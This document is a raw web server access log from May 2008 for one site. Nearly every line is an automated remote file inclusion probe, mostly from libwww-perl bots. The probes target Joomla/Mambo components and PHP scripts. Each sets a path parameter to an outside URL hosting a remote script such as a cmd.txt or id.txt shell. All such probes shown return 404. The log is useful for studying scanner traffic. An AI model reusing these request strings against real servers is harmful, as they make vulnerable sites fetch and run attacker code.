216.17.101.27 - - [06/May/2008:12:13:26 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [06/May/2008:12:13:26 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [06/May/2008:12:13:26 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [06/May/2008:12:13:26 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [06/May/2008:12:13:26 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [06/May/2008:12:13:26 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.179.0.195 - - [06/May/2008:12:13:32 -0700] "GET /logs/access_071224.log/main.php?pageURL=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [06/May/2008:12:13:33 -0700] "GET /main.php?pageURL=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [06/May/2008:12:13:33 -0700] "GET /logs/main.php?pageURL=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
80.93.56.80 - - [06/May/2008:12:13:35 -0700] "GET /logs/access_071228.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://root.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.155.232.37 - - [06/May/2008:12:13:36 -0700] "GET /logs/access_071230.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.onyxclub.ru/administrator/components/com_remository/idf.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [06/May/2008:12:13:37 -0700] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.onyxclub.ru/administrator/components/com_remository/idf.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [06/May/2008:12:13:37 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.onyxclub.ru/administrator/components/com_remository/idf.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [06/May/2008:12:13:40 -0700] "GET /logs/access_080228.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.192.70.11 - - [06/May/2008:12:13:47 -0700] "GET /logs/access_080312.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
82.192.70.11 - - [06/May/2008:12:13:48 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
82.192.70.11 - - [06/May/2008:12:13:48 -0700] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
67.19.105.42 - - [06/May/2008:12:13:49 -0700] "GET /logs/access_080228.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.249.105.66 - - [06/May/2008:12:13:57 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.66 - - [06/May/2008:12:13:58 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.66 - - [06/May/2008:12:13:58 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.66 - - [06/May/2008:12:13:59 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.66 - - [06/May/2008:12:14:00 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.66 - - [06/May/2008:12:14:00 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.179.0.195 - - [06/May/2008:12:14:02 -0700] "GET /logs/access_071224.log/main.php?pageURL=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [06/May/2008:12:14:02 -0700] "GET /main.php?pageURL=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [06/May/2008:12:14:03 -0700] "GET /logs/main.php?pageURL=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
208.80.193.53 - - [06/May/2008:12:14:03 -0700] "GET / HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; DFAIT; .NET CLR 1.1.4322)" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:12:14:15 -0700] "GET /logs/access_080228.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
131.128.169.79 - - [06/May/2008:12:14:29 -0700] "GET /logs/access_080228.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.155.232.37 - - [06/May/2008:12:14:31 -0700] "GET /logs/access_080130.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.onyxclub.ru/administrator/components/com_remository/idf.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:12:14:34 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:12:14:34 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:12:14:35 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:12:14:35 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:12:14:35 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:12:14:35 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.189.175.160 - - [06/May/2008:12:14:52 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.189.175.160 - - [06/May/2008:12:14:52 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.70.11 - - [06/May/2008:12:14:53 -0700] "GET /logs/access_080126.log//components/com_forum/download.php?phpbb_root_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.189.175.160 - - [06/May/2008:12:14:53 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [06/May/2008:12:15:13 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.onyxclub.ru/administrator/components/com_remository/idf.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [06/May/2008:12:15:14 -0700] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.onyxclub.ru/administrator/components/com_remository/idf.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:12:15:14 -0700] "GET /logs/access_080218.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.159.45.5 - - [06/May/2008:12:15:16 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.159.45.5 - - [06/May/2008:12:15:16 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.159.45.5 - - [06/May/2008:12:15:16 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.231.120.104 - - [06/May/2008:12:15:20 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://users.volja.net/smrad/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.231.120.104 - - [06/May/2008:12:15:21 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://users.volja.net/smrad/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.189.175.160 - - [06/May/2008:12:15:30 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.189.175.160 - - [06/May/2008:12:15:31 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.189.175.160 - - [06/May/2008:12:15:31 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.54.9.218 - - [06/May/2008:12:15:33 -0700] "GET /logs/access_080220.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [06/May/2008:12:15:34 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [06/May/2008:12:15:34 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.100.7.111 - - [06/May/2008:12:15:43 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=injexhttp://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.215.178 - - [06/May/2008:12:15:56 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.215.178 - - [06/May/2008:12:15:58 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.215.178 - - [06/May/2008:12:15:58 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.215.178 - - [06/May/2008:12:16:03 -0700] "GET /logs/access_080228.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.179.0.195 - - [06/May/2008:12:16:13 -0700] "GET /logs/access_080303.log/main.php?pageURL=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [06/May/2008:12:16:13 -0700] "GET /main.php?pageURL=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [06/May/2008:12:16:14 -0700] "GET /logs/main.php?pageURL=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
87.249.105.66 - - [06/May/2008:12:16:18 -0700] "GET /logs/access_080228.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.76.134 - - [06/May/2008:12:16:47 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://tare12.nm.ru.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.22.204.188 - - [06/May/2008:12:16:47 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://tare12.nm.ru.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [06/May/2008:12:16:47 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://tare12.nm.ru.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.64.29 - - [06/May/2008:12:17:09 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.64.29 - - [06/May/2008:12:17:09 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.64.29 - - [06/May/2008:12:17:10 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.38.12.93 - - [06/May/2008:12:17:18 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=injexhttp://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.105.42 - - [06/May/2008:12:17:26 -0700] "GET /logs/access_080201.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.54.9.218 - - [06/May/2008:12:17:28 -0700] "GET /logs/access_080315.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:12:17:30 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:12:17:31 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:12:17:31 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.17.101.27 - - [06/May/2008:12:18:02 -0700] "GET /logs/access_080201.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [06/May/2008:12:18:03 -0700] "GET /logs/access_080131.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [06/May/2008:12:18:05 -0700] "GET /logs/access_080201.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.67.26.84 - - [06/May/2008:12:18:12 -0700] "GET /logs//main.php?sayfa=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [06/May/2008:12:18:12 -0700] "GET //main.php?sayfa=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.70.11 - - [06/May/2008:12:18:31 -0700] "GET /logs/access_080224.log/components/com_performs/performs.php?mosConfig_absolute_path=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
87.249.105.66 - - [06/May/2008:12:18:35 -0700] "GET /logs/access_080201.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.24.55 - - [06/May/2008:12:18:37 -0700] "GET /logs/access_080202.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:12:18:45 -0700] "GET /logs/access_080201.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:12:18:45 -0700] "GET /logs/access_080201.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.249.105.66 - - [06/May/2008:12:18:47 -0700] "GET /logs/access_080201.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
131.128.169.79 - - [06/May/2008:12:18:49 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [06/May/2008:12:18:49 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [06/May/2008:12:18:49 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [06/May/2008:12:18:49 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [06/May/2008:12:18:50 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [06/May/2008:12:18:53 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.16.226 - - [06/May/2008:12:19:17 -0700] "GET /admin/kfm/initialise.php?kfm_base_path=http://gundam-gundam.net/id?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
67.159.45.5 - - [06/May/2008:12:19:42 -0700] "GET /logs/access_080201.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.173.72 - - [06/May/2008:12:20:03 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.159.45.5 - - [06/May/2008:12:20:31 -0700] "GET /logs/access_080201.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.7.108.240 - - [06/May/2008:12:20:37 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [06/May/2008:12:20:37 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [06/May/2008:12:20:37 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [06/May/2008:12:20:37 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [06/May/2008:12:20:37 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [06/May/2008:12:20:37 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.188 - - [06/May/2008:12:20:58 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://tare12.nm.ru.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:12:21:19 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:12:21:19 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
69.72.215.178 - - [06/May/2008:12:21:19 -0700] "GET /logs/access_080201.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.105.42 - - [06/May/2008:12:21:38 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [06/May/2008:12:21:38 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
